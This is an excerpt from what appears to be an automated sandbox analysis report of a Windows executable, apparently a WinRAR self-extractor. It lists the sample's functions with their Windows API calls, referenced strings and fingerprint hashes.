                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
                                                                                              • Opcode ID: e149ce5aca20fab3789138c7459f8a0730dea58c14ead1d6e9b6eeec37c18aef
                                                                                              • Instruction ID: 7f97bbb7e2b0233e7945e762b515c2e5d435f4934bb7b82891c36435c11527f5
                                                                                              • Opcode Fuzzy Hash: e149ce5aca20fab3789138c7459f8a0730dea58c14ead1d6e9b6eeec37c18aef
                                                                                              • Instruction Fuzzy Hash: 6D4149B5508305AFC310DF65C880A6BFBF8FB88714F004A2EF5D692650E778E599CB61
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0011F5A2,?,00000000,?,00000000,00000000), ref: 0011EE6F
                                                                                              • __fassign.LIBCMT ref: 0011EEEA
                                                                                              • __fassign.LIBCMT ref: 0011EF05
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0011EF2B
                                                                                              • WriteFile.KERNEL32(?,?,00000000,0011F5A2,00000000,?,?,?,?,?,?,?,?,?,0011F5A2,?), ref: 0011EF4A
                                                                                              • WriteFile.KERNEL32(?,?,00000001,0011F5A2,00000000,?,?,?,?,?,?,?,?,?,0011F5A2,?), ref: 0011EF83
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: c0eb4d654cc27dd2d400d2aec2e1ae85a42be79aacd4077d0ae5a91ebb021cd3
                                                                                              • Instruction ID: 1cec6f2e256e25cef6cf3a2bf6c77db6855ab617f2d85344058c331f1a96c171
                                                                                              • Opcode Fuzzy Hash: c0eb4d654cc27dd2d400d2aec2e1ae85a42be79aacd4077d0ae5a91ebb021cd3
                                                                                              • Instruction Fuzzy Hash: 6C51B471A00209AFDB14CFE8D845EEEBBF5EF08310F24452AED55E7291D7709991CB60
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0010C54A
                                                                                              • _swprintf.LIBCMT ref: 0010C57E
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • SetDlgItemTextW.USER32(?,00000066,0013946A), ref: 0010C59E
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0010C5D1
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010C6B2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 2892007947-1360425832
                                                                                              • Opcode ID: ac6465cd00770d3002e0f9fe2fb40889a62f2d4401bf087a457a81e36a18c536
                                                                                              • Instruction ID: 1f4aaffe7e22169aaf62f87c011995b857b9f4175d56cfc04a6adc9f6941ef88
                                                                                              • Opcode Fuzzy Hash: ac6465cd00770d3002e0f9fe2fb40889a62f2d4401bf087a457a81e36a18c536
                                                                                              • Instruction Fuzzy Hash: 0C41B275A0061CEADB25DBA0DC45EEA77BCEF18315F0041A2E549D70A1E7B19BC4CF90
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0010964E
                                                                                              • GetWindowRect.USER32(?,00000000), ref: 00109693
                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 0010972A
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00109732
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00109748
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Window$Show$RectText
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3937224194-1658105358
                                                                                              • Opcode ID: a1db653dfbcd76ba175ed3a1542b69d4740148071788eb547d4d8d67c3125119
                                                                                              • Instruction ID: 9bda25b4e372d87b2b6d8e70212f8dff1fd9ec5f021f65ab874ed9289617a8ae
                                                                                              • Opcode Fuzzy Hash: a1db653dfbcd76ba175ed3a1542b69d4740148071788eb547d4d8d67c3125119
                                                                                              • Instruction Fuzzy Hash: 5F31C132104300EFCB259F64DC88B6B7BA8EF49702F054559FE899A1A7DBB4D984CF61
                                                                                              APIs
                                                                                                • Part of subcall function 0011BF79: _free.LIBCMT ref: 0011BFA2
                                                                                              • _free.LIBCMT ref: 0011C003
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 0011C00E
                                                                                              • _free.LIBCMT ref: 0011C019
                                                                                              • _free.LIBCMT ref: 0011C06D
                                                                                              • _free.LIBCMT ref: 0011C078
                                                                                              • _free.LIBCMT ref: 0011C083
                                                                                              • _free.LIBCMT ref: 0011C08E
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                                                              • Instruction ID: 71ea666d8507f4cead3b5c396271b0ca96d037a6d9ce54773124971b7c5f7a42
                                                                                              • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                                                              • Instruction Fuzzy Hash: 0B117F31584B09FAD634BBB0CC47FCBB79D6F20700F40C834B299A6852DF64F9858A90
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,001120C1,0010FB12), ref: 001120D8
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001120E6
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001120FF
                                                                                              • SetLastError.KERNEL32(00000000,?,001120C1,0010FB12), ref: 00112151
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 740f8a3b85c0a49057adf624abeb920775237ae90eb24d7ca034275f481c3d82
                                                                                              • Instruction ID: 86a422ddb6645f4a18a13f7f2ab1eb9ecd509aaf88924e1008a0fc77420f251f
                                                                                              • Opcode Fuzzy Hash: 740f8a3b85c0a49057adf624abeb920775237ae90eb24d7ca034275f481c3d82
                                                                                              • Instruction Fuzzy Hash: 8D01D4362193117EA67CABB57C855EA7A88FB21770B210739F230554E0EF214CE69158
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 0-1718035505
                                                                                              • Opcode ID: 6a7385e155a391f7b2021d8dc6eb37e897ea77eb53b16ccd5835af5bf277d7b8
                                                                                              • Instruction ID: 4637934e69a6b86389000b9539369b246a6e08d7f4bb91bf3a2ae45f13e46156
                                                                                              • Opcode Fuzzy Hash: 6a7385e155a391f7b2021d8dc6eb37e897ea77eb53b16ccd5835af5bf277d7b8
                                                                                              • Instruction Fuzzy Hash: 5901F932641362ABDF316EF47D856A657949B46353320127EF581D72C0EBE1C8C1D7A0
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00100D0D
                                                                                                • Part of subcall function 000FACF5: GetVersionExW.KERNEL32(?), ref: 000FAD1A
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,00100CB8), ref: 00100D31
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00100D47
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00100D56
                                                                                              • SystemTimeToFileTime.KERNEL32(?,00100CB8), ref: 00100D64
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00100D72
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: b47497ec13b860853571f46ceaca7ceed91ebffa6332e621aa6185cedaa250d7
                                                                                              • Instruction ID: 4a9a562a3f50b734cf029d2e102586883d2ff7cae2bc678eaf57fef4c2171192
                                                                                              • Opcode Fuzzy Hash: b47497ec13b860853571f46ceaca7ceed91ebffa6332e621aa6185cedaa250d7
                                                                                              • Instruction Fuzzy Hash: 4131F77A900209ABCB10DFE4C8859EEBBB8FF58300B04441AE955E3610E7349695CB68
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: ade6d281bee31979f328668844c3bb00cf9c095b2e73c2627a9aca66ea613e60
                                                                                              • Instruction ID: a9c40054832483147b96b7875524a9521ece56951446faee9e9a65072157e8e0
                                                                                              • Opcode Fuzzy Hash: ade6d281bee31979f328668844c3bb00cf9c095b2e73c2627a9aca66ea613e60
                                                                                              • Instruction Fuzzy Hash: A221A47160010EBBD7199E10DC92E3B77ADEB60784B118128FC899B283E7B4ED569790
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00130EE8,00113E14,00130EE8,?,?,00113713,00000050,?,00130EE8,00000200), ref: 00118FA9
                                                                                              • _free.LIBCMT ref: 00118FDC
                                                                                              • _free.LIBCMT ref: 00119004
                                                                                              • SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 00119011
                                                                                              • SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 0011901D
                                                                                              • _abort.LIBCMT ref: 00119023
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 2a78d196c587eb3650f8b20b44282392a3058e0847ca948b180f0bd7ab6c3d1b
                                                                                              • Instruction ID: 7ec5a250f4e38b541abfa3eff4b476a41d6cebf39e2af1ef8fdc0751f9c8cf7e
                                                                                              • Opcode Fuzzy Hash: 2a78d196c587eb3650f8b20b44282392a3058e0847ca948b180f0bd7ab6c3d1b
                                                                                              • Instruction Fuzzy Hash: 11F02836605A017AC23E33246C0AFEF296B9FE0760F358134F424D2692EF20C9D35025
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0010D2F2
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0010D30C
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0010D31D
                                                                                              • TranslateMessage.USER32(?), ref: 0010D327
                                                                                              • DispatchMessageW.USER32(?), ref: 0010D331
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0010D33C
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              APIs
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0010C435
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CompareString_wcschr
                                                                                              • String ID: <$HIDE$MAX$MIN
                                                                                              • API String ID: 2548945186-3358265660
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 0010ADFD
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0010AE22
                                                                                              • DeleteObject.GDI32(00000000), ref: 0010AE54
                                                                                              • DeleteObject.GDI32(00000000), ref: 0010AE77
                                                                                                • Part of subcall function 00109E1C: FindResourceW.KERNEL32(0010AE4D,PNG,?,?,?,0010AE4D,00000066), ref: 00109E2E
                                                                                                • Part of subcall function 00109E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0010AE4D,00000066), ref: 00109E46
                                                                                                • Part of subcall function 00109E1C: LoadResource.KERNEL32(00000000,?,?,?,0010AE4D,00000066), ref: 00109E59
                                                                                                • Part of subcall function 00109E1C: LockResource.KERNEL32(00000000,?,?,?,0010AE4D,00000066), ref: 00109E64
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                              • String ID: ]
                                                                                              • API String ID: 142272564-3352871620
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010CCDB
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0010CCF1
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0010CD05
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0010CD14
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00117573,00000000,?,00117513,00000000,0012BAD8,0000000C,0011766A,00000000,00000002), ref: 001175E2
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001175F5
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00117573,00000000,?,00117513,00000000,0012BAD8,0000000C,0011766A,00000000,00000002), ref: 00117618
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              APIs
                                                                                                • Part of subcall function 00100085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001000A0
                                                                                                • Part of subcall function 00100085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000FEB86,Crypt32.dll,00000000,000FEC0A,?,?,000FEBEC,?,?,?), ref: 001000C2
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000FEB92
                                                                                              • GetProcAddress.KERNEL32(001381C0,CryptUnprotectMemory), ref: 000FEBA2
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0011B619
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0011B63C
                                                                                                • Part of subcall function 00118518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0011B662
                                                                                              • _free.LIBCMT ref: 0011B675
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0011B684
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,0011895F,001185FB,?,00118FD3,00000001,00000364,?,00113713,00000050,?,00130EE8,00000200), ref: 0011902E
                                                                                              • _free.LIBCMT ref: 00119063
                                                                                              • _free.LIBCMT ref: 0011908A
                                                                                              • SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 00119097
                                                                                              • SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 001190A0
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              APIs
                                                                                                • Part of subcall function 00100A41: ResetEvent.KERNEL32(?), ref: 00100A53
                                                                                                • Part of subcall function 00100A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00100A67
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0010078F
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 001007A9
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 001007C2
                                                                                              • CloseHandle.KERNEL32(?), ref: 001007CE
                                                                                              • CloseHandle.KERNEL32(?), ref: 001007DA
                                                                                                • Part of subcall function 0010084E: WaitForSingleObject.KERNEL32(?,000000FF,00100A78,?), ref: 00100854
                                                                                                • Part of subcall function 0010084E: GetLastError.KERNEL32(?), ref: 00100860
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0011BF28
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 0011BF3A
                                                                                              • _free.LIBCMT ref: 0011BF4C
                                                                                              • _free.LIBCMT ref: 0011BF5E
                                                                                              • _free.LIBCMT ref: 0011BF70
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0011807E
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 00118090
                                                                                              • _free.LIBCMT ref: 001180A3
                                                                                              • _free.LIBCMT ref: 001180B4
                                                                                              • _free.LIBCMT ref: 001180C5
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\6uPVRnocVS.exe,00000104), ref: 001176FD
                                                                                              • _free.LIBCMT ref: 001177C8
                                                                                              • _free.LIBCMT ref: 001177D2
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                              • API String ID: 2506810119-2924311466
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F7579
                                                                                                • Part of subcall function 000F3B3D: __EH_prolog.LIBCMT ref: 000F3B42
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 000F7640
                                                                                                • Part of subcall function 000F7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 000F7C04
                                                                                                • Part of subcall function 000F7BF5: GetLastError.KERNEL32 ref: 000F7C4A
                                                                                                • Part of subcall function 000F7BF5: CloseHandle.KERNEL32(?), ref: 000F7C59
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 3813983858-639343689
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010A4B8
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0010A4CD
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0010A4E2
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: __fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 1857242416-834177443
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010A9DE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0010A9F6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0010AA24
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 000FB51E
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • _wcschr.LIBVCRUNTIME ref: 000FB53C
                                                                                              • _wcschr.LIBVCRUNTIME ref: 000FB54C
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 525462905-3142399695
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,000FABC5,00000008,?,00000000,?,000FCB88,?,00000000), ref: 001006F3
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,000FABC5,00000008,?,00000000,?,000FCB88,?,00000000), ref: 001006FD
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,000FABC5,00000008,?,00000000,?,000FCB88,?,00000000), ref: 0010070D
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00100725
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,000F80B7,?,?,?), ref: 000FA351
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,000F80B7,?,?), ref: 000FA395
                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,000F80B7,?,?,?,?,?,?,?,?), ref: 000FA416
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,000F80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 000FA41D
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001189AD,?,00000000,?,00000001,?,?,00000001,001189AD,?), ref: 0011C0E6
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0011C16F
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001167E2,?), ref: 0011C181
                                                                                              • __freea.LIBCMT ref: 0011C18A
                                                                                                • Part of subcall function 00118518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              APIs
                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0011251A
                                                                                                • Part of subcall function 00112B52: ___AdjustPointer.LIBCMT ref: 00112B9C
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00112531
                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00112543
                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00112567
                                                                                              Similarity
                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                              • String ID:
                                                                                              • API String ID: 2633735394-0
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00109DBE
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00109DCD
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00109DDB
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00109DE9
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00112016
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0011201B
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00112020
                                                                                                • Part of subcall function 0011310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0011311F
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00112035
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
